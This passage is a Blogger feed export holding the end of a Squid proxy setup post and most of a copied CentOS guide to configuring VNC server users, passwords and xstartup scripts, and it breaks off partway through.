-webkit-background-clip: initial; -webkit-background-origin: initial; background-color: rgb(238, 238, 238); border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 1px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(221, 221, 221); border-right-color: rgb(221, 221, 221); border-bottom-color: rgb(221, 221, 221); border-left-color: rgb(221, 221, 221); overflow-x: auto; overflow-y: auto; clear: both; font-size: 0.929em; line-height: 1.385em; background-position: initial initial; "&gt;Flushing firewall rules:                                   [  OK  ] Setting chains to policy ACCEPT: filter                    [  OK  ] Unloading iptables modules:                                [  OK  ] Applying iptables firewall rules:                          [  OK  ] Loading additional iptables modules: ip_conntrack_netbios_n[  OK  ]&lt;/pre&gt;&lt;h2 style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 0px; margin-left: 0px; font-size: 1.8em; font-weight: normal; line-height: 1.267em; "&gt;Client configuration&lt;/h2&gt;&lt;p style="padding-top: 0px; padding-right: 0px; padding-bottom: 0px; padding-left: 0px; margin-top: 0px; margin-right: 0px; margin-bottom: 1.571em; margin-left: 0px; "&gt;Open a webbrowser &gt; Tools &gt; Internet option &gt; Network settings &gt; and setup Squid server IP address and port # 3128.&lt;/p&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8668264831440713284-7939333563582248524?l=bbtuna1364.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://bbtuna1364.blogspot.com/feeds/7939333563582248524/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/install-squid-proxy-server-on-centos.html#comment-form' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/7939333563582248524'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8668264831440713284/posts/default/7939333563582248524'/><link rel='alternate' type='text/html' href='http://bbtuna1364.blogspot.com/2010/02/install-squid-proxy-server-on-centos.html' title='Install Squid Proxy Server on CentOS'/><author><name>BBTUNA</name><uri>http://www.blogger.com/profile/10330198244468715380</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8668264831440713284.post-2002617246093625208</id><published>2010-02-05T22:33:00.000-08:00</published><updated>2010-02-05T22:35:06.342-08:00</updated><title type='text'>VNC ( Virtual Network Computing ) on CentOS</title><content type='html'>&lt;span class="Apple-style-span" style="font-family: 'DejaVu Sans', 'Liberation Sans', sans-serif; font-size: 14px; line-height: 17px; "&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;VNC is used to display an X windows session running on another computer. Unlike a remote X connection, the xserver is running on the remote computer, not on your local workstation. Your workstation ( Linux or Windows ) is only displaying a copy of the display ( real or virtual ) that is running on the remote machine.&lt;span class="anchor" id="line-7"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-8"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;There are several ways to configure the vnc server. This HOWTO shows you how to configure VNC using the 'vncserver' service as supplied by CentOS.&lt;span class="anchor" id="line-9"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-10"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h2 id="head-76401321dae4d80916a7fd7e710272a9b85c9485" style="font-size: 1.4em; line-height: 1.8em; margin-top: 1.6em; margin-right: 0px; margin-bottom: 0.8em; margin-left: 0px; padding-left: 0.7em; background-image: url(http://wiki.centos.org/wiki/modern-CentOS/img/moin-h2-background.png); border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; color: rgb(7, 43, 97); "&gt;1. Installing the required packages&lt;/h2&gt;&lt;span class="anchor" id="line-11"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;The server package is called 'vnc-server'. Run the command &lt;em&gt;&lt;strong&gt;rpm -q vnc-server&lt;/strong&gt;&lt;/em&gt;.&lt;span class="anchor" id="line-12"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-13"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;The result will be either &lt;strong&gt;package vnc-server is not installed&lt;/strong&gt; or something like &lt;strong&gt;vnc-server-4.0-11.el4&lt;/strong&gt;.&lt;span class="anchor" id="line-14"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-15"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;If the server is not installed, install it with the command: &lt;em&gt;&lt;strong&gt;yum install vnc-server&lt;/strong&gt;&lt;/em&gt;.&lt;span class="anchor" id="line-16"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-17"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;The client program is 'vnc'. You can use the command &lt;em&gt;&lt;strong&gt;yum install vnc&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/em&gt;&lt;strong&gt;&lt;/strong&gt; to install the client if &lt;em&gt;&lt;strong&gt;rpm -q vnc&lt;/strong&gt;&lt;/em&gt; shows that it is not already installed.&lt;span class="anchor" id="line-18"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-19"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Make sure to install a window manager in order to get a normal GUI desktop. You can use the command &lt;em&gt;&lt;strong&gt;yum groupinstall "GNOME Desktop Environment"&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/em&gt; to install the Gnome Desktop and requirements, for example. Other popular desktop environments are "KDE" and "XFCE-4.4". XFCE is more light-weight than Gnome or KDE and available from the "extras" repository.&lt;span class="anchor" id="line-20"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-21"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;img alt="" /&gt;" height="15" src="http://wiki.centos.org/wiki/modern-CentOS/img/attention.png" title="&lt;!&gt;" width="15" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; "&gt; If you are running CentOS 5, &lt;tt class="backtick" style="font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; "&gt;yum groupinstall "GNOME Desktop Environment"&lt;/tt&gt; may complain about a missing libgaim.so.0. This is a known bug. Please see&lt;a class="http" href="http://wiki.centos.org/FAQ/CentOS5#head-e99a7921ab6ce47e1cbf7d8cc8cadecf92b7ce94" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; text-decoration: none; color: rgb(32, 76, 141); "&gt;CentOS-5 FAQ&lt;/a&gt; for details.&lt;span class="anchor" id="line-22"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-23"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h2 id="head-95408f573ed703520125debac669df9c87256b82" style="font-size: 1.4em; line-height: 1.8em; margin-top: 1.6em; margin-right: 0px; margin-bottom: 0.8em; margin-left: 0px; padding-left: 0.7em; background-image: url(http://wiki.centos.org/wiki/modern-CentOS/img/moin-h2-background.png); border-top-style: none; border-right-style: none; border-bottom-style: none; border-left-style: none; border-width: initial; border-color: initial; color: rgb(7, 43, 97); "&gt;2. Configuring un-encrypted VNC&lt;/h2&gt;&lt;span class="anchor" id="line-24"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;We will be setting up VNC for 3 users. These will be 'larry', 'moe', and 'curly'.&lt;span class="anchor" id="line-25"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-26"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;You will perform the following steps to configure your VNC server:&lt;span class="anchor" id="line-27"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-28"&gt;&lt;/span&gt;&lt;/p&gt;&lt;ol type="1" style="padding-left: 0.5em; margin-left: 3em; margin-bottom: 0.3em; list-style-image: none !important; "&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;Create your VNC users.&lt;span class="anchor" id="line-29"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;Set your users' VNC passwords.&lt;span class="anchor" id="line-30"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;Edit the server configuration.&lt;span class="anchor" id="line-31"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;Create and customize xstartup scripts.&lt;span class="anchor" id="line-32"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;Start the VNC service.&lt;span class="anchor" id="line-33"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;Test each VNC user.&lt;span class="anchor" id="line-34"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;Setup the VNC service to start on reboot.&lt;span class="anchor" id="line-35"&gt;&lt;/span&gt;&lt;/li&gt;&lt;li style="padding-left: 0em; margin-bottom: 0.3em; "&gt;Additional optional enhancements&lt;span class="anchor" id="line-36"&gt;&lt;/span&gt;&lt;/li&gt;&lt;/ol&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h3 id="head-2af7c99dd1f5f5b6c8bd1d4b4ada5e4823184064" style="font-size: 1.25em; line-height: 1.6em; margin-top: 1em; margin-bottom: 0.5em; padding-left: 0.7em; color: rgb(7, 43, 97); border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(218, 218, 218); "&gt;2.1. Create your VNC users&lt;/h3&gt;&lt;span class="anchor" id="line-37"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;As &lt;a href="http://wiki.centos.org/TipsAndTricks/BecomingRoot" style="border-top-width: 0px; border-right-width: 0px; border-bottom-width: 0px; border-left-width: 0px; border-style: initial; border-color: initial; text-decoration: none; color: rgb(32, 76, 141); "&gt;root&lt;/a&gt;:&lt;span class="anchor" id="line-38"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-39"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;span class="anchor" id="line-40"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;$ su - &lt;span class="anchor" id="line-41"&gt;&lt;/span&gt;# useradd larry &lt;span class="anchor" id="line-42"&gt;&lt;/span&gt;# useradd moe &lt;span class="anchor" id="line-43"&gt;&lt;/span&gt;# useradd curly &lt;span class="anchor" id="line-44"&gt;&lt;/span&gt;# passwd larry &lt;span class="anchor" id="line-45"&gt;&lt;/span&gt;# passwd moe &lt;span class="anchor" id="line-46"&gt;&lt;/span&gt;# passwd curly &lt;span class="anchor" id="line-47"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-48"&gt;&lt;/span&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h3 id="head-7c49b55e2c2479da2b0fa1a35d1b86c96be828d5" style="font-size: 1.25em; line-height: 1.6em; margin-top: 1em; margin-bottom: 0.5em; padding-left: 0.7em; color: rgb(7, 43, 97); border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(218, 218, 218); "&gt;2.2. Set your users' VNC passwords&lt;/h3&gt;&lt;span class="anchor" id="line-49"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Login to each user, and run &lt;em&gt;&lt;strong&gt;vncpasswd&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/em&gt;&lt;strong&gt;&lt;/strong&gt;. This will create a &lt;strong&gt;.vnc&lt;/strong&gt; directory.&lt;span class="anchor" id="line-50"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-51"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;span class="anchor" id="line-52"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;[~]$ cd .vnc &lt;span class="anchor" id="line-53"&gt;&lt;/span&gt;[.vnc]$ ls &lt;span class="anchor" id="line-54"&gt;&lt;/span&gt;passwd &lt;span class="anchor" id="line-55"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-56"&gt;&lt;/span&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h3 id="head-4d3002833b106148eb6e5013b0a8cdccaf3a6cec" style="font-size: 1.25em; line-height: 1.6em; margin-top: 1em; margin-bottom: 0.5em; padding-left: 0.7em; color: rgb(7, 43, 97); border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(218, 218, 218); "&gt;2.3. Edit the server configuration&lt;/h3&gt;&lt;span class="anchor" id="line-57"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Edit &lt;em&gt;/etc/sysconfig/vncservers&lt;/em&gt;, and add the following to the end of the file.&lt;span class="anchor" id="line-58"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-59"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;span class="anchor" id="line-60"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;VNCSERVERS="1:larry 2:moe 3:curly" &lt;span class="anchor" id="line-61"&gt;&lt;/span&gt;VNCSERVERARGS[1]="-geometry 640x480" &lt;span class="anchor" id="line-62"&gt;&lt;/span&gt;VNCSERVERARGS[2]="-geometry 640x480" &lt;span class="anchor" id="line-63"&gt;&lt;/span&gt;VNCSERVERARGS[3]="-geometry 800x600" &lt;span class="anchor" id="line-64"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-65"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Larry will have a 640 by 480 screen, as will Moe. Curly will have an 800 by 600 screen.&lt;span class="anchor" id="line-66"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-67"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h3 id="head-01e0aa5bae2fffab22cb72ac774c9ae439f29311" style="font-size: 1.25em; line-height: 1.6em; margin-top: 1em; margin-bottom: 0.5em; padding-left: 0.7em; color: rgb(7, 43, 97); border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(218, 218, 218); "&gt;2.4. Create xstartup scripts&lt;/h3&gt;&lt;span class="anchor" id="line-68"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;We will create the xstartup scripts by starting and stopping the vncserver as root.&lt;span class="anchor" id="line-69"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-70"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;# /sbin/service vncserver start  &lt;span class="anchor" id="line-71"&gt;&lt;/span&gt;# /sbin/service vncserver stop &lt;span class="anchor" id="line-72"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-73"&gt;&lt;/span&gt;&lt;p class="line862" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Login to each user and edit the xstartup script. To use Larry as an example, first login as &lt;tt style="font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; "&gt;larry&lt;/tt&gt;&lt;span class="anchor" id="line-74"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-75"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;span class="anchor" id="line-76"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;[~]$ cd .vnc &lt;span class="anchor" id="line-77"&gt;&lt;/span&gt;[.vnc] ls &lt;span class="anchor" id="line-78"&gt;&lt;/span&gt;mymachine.localnet:1.log  passwd  xstartup &lt;span class="anchor" id="line-79"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-80"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Edit xstartup. The original should look like:&lt;span class="anchor" id="line-81"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-82"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;#!/bin/sh &lt;span class="anchor" id="line-83"&gt;&lt;/span&gt; &lt;span class="anchor" id="line-84"&gt;&lt;/span&gt;# Uncomment the following two lines for normal desktop: &lt;span class="anchor" id="line-85"&gt;&lt;/span&gt;# unset SESSION_MANAGER &lt;span class="anchor" id="line-86"&gt;&lt;/span&gt;# exec /etc/X11/xinit/xinitrc &lt;span class="anchor" id="line-87"&gt;&lt;/span&gt; &lt;span class="anchor" id="line-88"&gt;&lt;/span&gt;[ -x /etc/vnc/xstartup ] &amp;amp;&amp;amp; exec /etc/vnc/xstartup &lt;span class="anchor" id="line-89"&gt;&lt;/span&gt;[ -r $HOME/.Xresources ] &amp;amp;&amp;amp; xrdb $HOME/.Xresources &lt;span class="anchor" id="line-90"&gt;&lt;/span&gt;xsetroot -solid grey &lt;span class="anchor" id="line-91"&gt;&lt;/span&gt;vncconfig -iconic &amp;amp; &lt;span class="anchor" id="line-92"&gt;&lt;/span&gt;xterm -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &amp;amp; &lt;span class="anchor" id="line-93"&gt;&lt;/span&gt;twm &amp;amp; &lt;span class="anchor" id="line-94"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-95"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-96"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Add the line indicated below to assure that an xterm is always present, and uncomment the two lines as directed if you wish to run the user's normal desktop window manager in the VNC. Note that in the likely reduced resolution and color depth of a VNC window the full desktop will be rather cramped and a look bit odd. If you do not uncomment the two lines you will get a gray speckled background to the VNC window.&lt;span class="anchor" id="line-97"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-98"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;span class="anchor" id="line-99"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;#!/bin/sh (-) &lt;span class="anchor" id="line-100"&gt;&lt;/span&gt;# Add the following line to ensure you always have an xterm available. &lt;span class="anchor" id="line-101"&gt;&lt;/span&gt;( while true ; do xterm ; done ) &amp;amp; &lt;span class="anchor" id="line-102"&gt;&lt;/span&gt;# Uncomment the following two lines for normal desktop: &lt;span class="anchor" id="line-103"&gt;&lt;/span&gt;unset SESSION_MANAGER &lt;span class="anchor" id="line-104"&gt;&lt;/span&gt;exec /etc/X11/xinit/xinitrc &lt;span class="anchor" id="line-105"&gt;&lt;/span&gt;[ -x /etc/vnc/xstartup ] &amp;amp;&amp;amp; exec /etc/vnc/xstartup &lt;span class="anchor" id="line-106"&gt;&lt;/span&gt;[ -r $HOME/.Xresources ] &amp;amp;&amp;amp; xrdb $HOME/.Xresources &lt;span class="anchor" id="line-107"&gt;&lt;/span&gt;xsetroot -solid grey &lt;span class="anchor" id="line-108"&gt;&lt;/span&gt;vncconfig -iconic &amp;amp; &lt;span class="anchor" id="line-109"&gt;&lt;/span&gt;xterm -geometry 80x24+10+10 -ls -title "$VNCDESKTOP Desktop" &amp;amp; &lt;span class="anchor" id="line-110"&gt;&lt;/span&gt;twm &amp;amp; &lt;span class="anchor" id="line-111"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-112"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-113"&gt;&lt;/span&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h3 id="head-369c6322da40d7502413c54879c8840dfc76d93a" style="font-size: 1.25em; line-height: 1.6em; margin-top: 1em; margin-bottom: 0.5em; padding-left: 0.7em; color: rgb(7, 43, 97); border-bottom-width: 1px; border-bottom-style: solid; border-bottom-color: rgb(218, 218, 218); "&gt;2.5. Start the VNC server&lt;/h3&gt;&lt;span class="anchor" id="line-114"&gt;&lt;/span&gt;&lt;p class="line874" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;Start the vncserver as root.&lt;span class="anchor" id="line-115"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-116"&gt;&lt;/span&gt;&lt;/p&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;span class="anchor" id="line-117"&gt;&lt;/span&gt;&lt;/p&gt;&lt;pre style="border-top-width: 1px; border-right-width: 1px; border-bottom-width: 1px; border-left-width: 4px; border-top-style: solid; border-right-style: solid; border-bottom-style: solid; border-left-style: solid; border-top-color: rgb(229, 229, 229); border-right-color: rgb(229, 229, 229); border-bottom-color: rgb(229, 229, 229); border-left-color: rgb(229, 229, 229); background-color: rgb(255, 250, 233); padding-top: 0.5em; padding-right: 1em; padding-bottom: 0.5em; padding-left: 1em; margin-top: 0.5em; margin-right: 0px; margin-bottom: 0.5em; margin-left: 1.5em; font-family: 'DejaVu Sans Mono', 'Liberation Mono', monospace; white-space: pre; word-wrap: break-word; background-image: initial; background-repeat: initial; background-attachment: initial; -webkit-background-clip: initial; -webkit-background-origin: initial; background-position: initial initial; "&gt;# /sbin/service vncserver start &lt;span class="anchor" id="line-118"&gt;&lt;/span&gt;&lt;/pre&gt;&lt;span class="anchor" id="line-119"&gt;&lt;/span&gt;&lt;span class="anchor" id="line-120"&gt;&lt;/span&gt;&lt;p class="line867" style="margin-left: 1.5em; margin-bottom: 1.3em; line-height: 1.5em; padding-left: 0px; "&gt;&lt;/p&gt;&lt;h3 id="head-9e455188dbefc380fa1f9ad48f83bae8a7fd5553" style="font-size: 1.25em; line-height: 1.6em; margin-top: 1em; margin-bottom: 0.5em; padding-left: 0.7em; color: rgb(7, 43, 97); border-bottom-width: 